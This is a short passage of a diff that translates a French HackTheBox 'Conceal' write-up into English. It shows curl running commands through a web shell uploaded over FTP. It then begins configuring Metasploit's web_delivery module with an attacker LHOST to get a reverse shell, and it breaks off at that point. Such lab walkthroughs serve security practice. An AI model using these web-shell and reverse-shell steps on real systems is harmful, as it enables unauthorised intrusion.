0xex75-english/0xex75-english.github.io/_posts/2019-05-18-hackthebox-conceal.md

 	1423 bytes sent in 0.00 secs (17.8563 MB/s)
 	ftp>

-Donc après avoir upload le shell nous pouvons exécuter des commandes depuis curl.
+So after uploading the shell we can execute commands from curl.

 	root@Seyptoo:~/htb/box/Conceal# curl http://10.10.10.116/upload/index.asp -d "cmd=whoami"
 	[...SNIP...]
 	conceal\destitute
 	[...SNIP..]

-Parfait nous sommes prêt pour le reverse shell nous allons utiliser metasploit le module web_delivery pour effectué notre reverse shell avec sans aucun problème.
+Perfect we are ready for the reverse shell we will use metasploit the web_delivery module to perform our reverse shell with no problem.

 	msf > use exploit/multi/script/web_delivery
 	msf exploit(multi/script/web_delivery) > set LHOST 10.10.15.229